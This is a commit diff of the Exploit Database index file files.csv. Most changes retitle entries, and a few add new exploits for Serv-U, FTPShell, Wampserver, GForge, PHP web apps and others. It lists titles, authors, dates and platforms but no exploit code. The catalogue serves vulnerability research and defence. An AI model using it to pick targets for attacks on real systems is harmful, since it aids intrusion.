DB: 2016-12-27
4 new exploits Serv-U FTP Server < 5.2 - Remote Denial of Service RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service FTPShell Server 6.36 - '.csv' Local Denial of Service Serv-U FTP Server 3.x < 5.x - Privilege Escalation RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal IndexScript 2.8 - (show_cat.php cat_id) SQL Injection IndexScript 2.8 - 'cat_id' Parameter SQL Injection GForge < 4.6b2 - (skill_delete) SQL Injection GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection torrenttrader classic 1.07 - Multiple Vulnerabilities TorrentTrader Classic 1.07 - Multiple Vulnerabilities Camera Life 2.6.2 - 'id' SQL Injection Camera Life 2.6.2 - 'id' Parameter SQL Injection Full PHP Emlak Script - 'arsaprint.php id' SQL Injection Full PHP Emlak Script - 'arsaprint.php' SQL Injection CCMS 3.1 - (skin) Multiple Local File Inclusion CCMS 3.1 - 'skin' Parameter Local File Inclusion JMweb - Multiple (src) Local File Inclusion JMweb - 'src' Parameter Local File Inclusion geccBBlite 2.0 - (leggi.php id) SQL Injection geccBBlite 2.0 - 'id' Parameter SQL Injection PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection PHP-Fusion Mod recept - (kat_id) SQL Injection PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection Yerba SACphp 6.3 - (mod) Local File Inclusion Yerba SACphp 6.3 - Local File Inclusion Joomla! Component com_hotspots - (w) SQL Injection Joomla! Component com_hotspots - SQL Injection PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection PHP Autos 2.9.1 - 'catid' Parameter SQL Injection Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection AdMan 1.1.20070907 - 'campaignId' SQL Injection AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection Gforge 4.5.19 - Multiple SQL Injections Gforge 4.6 rc1 - (skill_edit) SQL Injection GForge 4.5.19 - Multiple SQL Injections Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting IranMC Arad Center - 'news.php id' SQL Injection IranMC Arad Center - SQL Injection Ayco Okul Portali - (linkid) SQL Injection (tr) Ayco Okul Portali - 'linkid' Parameter SQL Injection Easynet4u faq Host - 'faq.php faq' SQL Injection Easynet4u faq Host - 'faq.php' SQL Injection MunzurSoft Wep Portal W3 - (kat) SQL Injection Easynet4u Link Host - 'cat_id' SQL Injection SlimCMS 1.0.0 - (redirect.php) Privilege Escalation Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection Easynet4u Link Host - 'cat_id' Parameter SQL Injection SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection Real Estate Scripts 2008 - 'index.php cat' SQL Injection Real Estate Scripts 2008 - 'cat' Parameter SQL Injection ParsBlogger - 'links.asp id' SQL Injection IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection ParsBlogger - 'links.asp' SQL Injection IndexScript 3.0 - 'parent_id' Parameter SQL Injection XOOPS Module xhresim - 'index.php no' SQL Injection XOOPS Module xhresim - SQL Injection SezHoo 0.1 - (IP) Remote File Inclusion SezHoo 0.1 - Remote File Inclusion torrenttrader classic 1.09 - Multiple Vulnerabilities TorrentTrader Classic 1.09 - Multiple Vulnerabilities AdaptCMS Lite 1.5 2009-07-07 - Exploit AdaptCMS Lite 1.5 - Arbitrary Add Admin Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting Joomla! Component Blog Calendar - SQL Injection PHPMailer 5.2.17 - Remote Code Execution
This commit is contained in:
parent
af66bcd9e5
commit
6a202bbb97
6 changed files with 286 additions and 48 deletions
98
files.csv
98
files.csv
|
@ -71,7 +71,7 @@ id,file,description,date,author,platform,type,port
|
|||
428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0
|
||||
429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0
|
||||
433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos,0
|
||||
463,platforms/windows/dos/463.c,"Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
|
||||
463,platforms/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
|
||||
468,platforms/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",windows,dos,0
|
||||
471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66
|
||||
474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0
|
||||
|
@ -814,7 +814,7 @@ id,file,description,date,author,platform,type,port
|
|||
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
|
||||
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
|
||||
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0
|
||||
6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
|
||||
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
|
@ -960,7 +960,7 @@ id,file,description,date,author,platform,type,port
|
|||
8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
|
||||
8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0
|
||||
8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0
|
||||
8212,platforms/windows/dos/8212.pl,"Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
|
||||
8212,platforms/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
|
||||
8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0
|
||||
8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0
|
||||
8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0
|
||||
|
@ -5330,6 +5330,7 @@ id,file,description,date,author,platform,type,port
|
|||
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
|
||||
40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -5444,7 +5445,7 @@ id,file,description,date,author,platform,type,port
|
|||
369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0
|
||||
374,platforms/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local,0
|
||||
375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",linux,local,0
|
||||
381,platforms/windows/local/381.c,"Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
|
||||
381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
|
||||
388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
|
||||
393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
|
||||
|
@ -8735,6 +8736,7 @@ id,file,description,date,author,platform,type,port
|
|||
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
|
||||
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
|
||||
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
|
||||
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -9889,7 +9891,7 @@ id,file,description,date,author,platform,type,port
|
|||
8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow",2009-03-12,"Jeremy Brown",windows,remote,0
|
||||
8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0
|
||||
8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0
|
||||
8211,platforms/windows/remote/8211.pl,"Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
|
||||
8211,platforms/windows/remote/8211.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
|
||||
8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0
|
||||
8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote,0
|
||||
8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
|
||||
|
@ -11785,7 +11787,7 @@ id,file,description,date,author,platform,type,port
|
|||
20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0
|
||||
20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0
|
||||
20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0
|
||||
20461,platforms/windows/remote/20461.txt,"Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
|
||||
20461,platforms/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
|
||||
20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0
|
||||
20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0
|
||||
20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection",1999-07-23,fsaa,cgi,remote,0
|
||||
|
@ -17830,7 +17832,7 @@ id,file,description,date,author,platform,type,port
|
|||
4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0
|
||||
4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0
|
||||
4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0
|
||||
4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0
|
||||
4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' Parameter SQL Injection",2007-07-25,xssvgamer,php,webapps,0
|
||||
40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0
|
||||
4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0
|
||||
|
@ -17915,7 +17917,7 @@ id,file,description,date,author,platform,type,port
|
|||
4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
|
||||
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
|
||||
4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
|
||||
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
|
||||
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
|
||||
4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
|
||||
4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0
|
||||
4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0
|
||||
|
@ -17986,7 +17988,7 @@ id,file,description,date,author,platform,type,port
|
|||
4496,platforms/php/webapps/4496.txt,"Joomla! Component Flash Image Gallery - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps,0
|
||||
4497,platforms/php/webapps/4497.txt,"Joomla! Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0
|
||||
4499,platforms/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0
|
||||
4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
|
||||
4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
|
||||
4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0
|
||||
4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - (xkurl.php PEARPATH) Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0
|
||||
4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0
|
||||
|
@ -19232,7 +19234,7 @@ id,file,description,date,author,platform,type,port
|
|||
6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0
|
||||
6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0
|
||||
6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0
|
||||
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
|
||||
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' Parameter SQL Injection",2008-07-25,nuclear,php,webapps,0
|
||||
6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
|
||||
6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0
|
||||
6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
|
||||
|
@ -19611,73 +19613,73 @@ id,file,description,date,author,platform,type,port
|
|||
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
|
||||
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
|
||||
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
|
||||
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Parameter Local File Inclusion",2008-10-03,SirGod,php,webapps,0
|
||||
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
|
||||
6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps,0
|
||||
6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion",2008-10-04,SirGod,php,webapps,0
|
||||
6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Parameter Local File Inclusion",2008-10-04,SirGod,php,webapps,0
|
||||
6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0
|
||||
6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0
|
||||
6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
|
||||
6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0
|
||||
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0
|
||||
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0
|
||||
6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0
|
||||
6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0
|
||||
6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0
|
||||
6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - (kat_id) SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
|
||||
6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion",2008-10-06,NoGe,php,webapps,0
|
||||
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
|
||||
6691,platforms/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0
|
||||
6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0
|
||||
6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - SQL Injection",2008-10-07,cOndemned,php,webapps,0
|
||||
6693,platforms/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps,0
|
||||
6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0
|
||||
6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
|
||||
6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,php,webapps,0
|
||||
6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0
|
||||
6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0
|
||||
6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0
|
||||
6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
|
||||
6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
|
||||
6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD",2008-10-08,GoLd_M,php,webapps,0
|
||||
6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps,0
|
||||
6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
|
||||
6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0
|
||||
6707,platforms/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
|
||||
6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection",2008-10-09,beford,php,webapps,0
|
||||
6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0
|
||||
